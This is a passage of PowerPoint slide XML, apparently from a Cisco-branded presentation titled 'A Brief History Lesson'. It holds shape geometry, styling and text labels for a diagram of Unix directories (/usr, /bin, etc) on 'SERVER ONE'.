                  <a:lnTo>
                    <a:pt x="1882222" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916632" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939191" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947290" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947290" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939191" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916632" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882222" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838570" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="3418205" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3367983" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324369" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3289978" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267426" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267426" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3289978" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324369" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3367983" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="1474216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="158876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="1474216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252548" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286993" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309618" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317753" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317753" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309618" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286993" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252548" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FAAB17"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5157215" y="2126742"/>
              <a:ext cx="3577590" cy="2545715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="2604008" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2553972" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510470" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476138" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453607" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2445512" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2445512" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453607" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476138" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510470" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553972" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604008" y="1474342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654229" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697843" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732234" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754786" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762885" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762885" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754786" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732234" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697843" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654229" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604008" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="3418205" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3368178" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324588" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290124" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267475" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267475" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290124" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324588" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3368178" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="1474342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="158876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="1474342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209098" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252712" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287103" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309655" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317754" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317754" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309655" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287103" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252712" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209098" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="566674" y="1070609"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="516452" y="1078708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="1101260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="1135651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="1179265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="1229487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="2386926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="2436945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="2480438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="2514769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516452" y="2537300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="2545397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616749" y="2537300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660345" y="2514769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694790" y="2480438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717415" y="2436945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725551" y="2386926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725551" y="1229487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717415" y="1179265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694790" y="1135651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660345" y="1101260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616749" y="1078708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="1070609"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00BBEB"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7134D7-3D8F-174D-AE56-7A01959C389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946115" y="2550071"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/usr</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA6220-359E-E743-8FD8-C3A0A56996E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393829" y="3869531"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER ONE</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5BD2EF-5CBB-EB4D-A153-8BB8D8EA6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719486" y="3209801"/>
            <a:ext cx="1515655" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557F361B-BCC7-7845-B8E2-F6C18A85A95B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3982149" y="2550071"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E97563F-0B9C-F14C-8534-8AB945859382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018182" y="2550071"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA54E651-7262-CF41-94F3-2FE11457EEE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692763" y="4563853"/>
            <a:ext cx="7995611" cy="449916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FA1B5-2BA1-DB45-94AB-500D17F946B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316650" y="136418"/>
            <a:ext cx="5764376" cy="319204"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Brief History Lesson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4495559-9397-6F4C-B152-0E49CF0F1DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374372" y="511879"/>
            <a:ext cx="7648931" cy="314882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
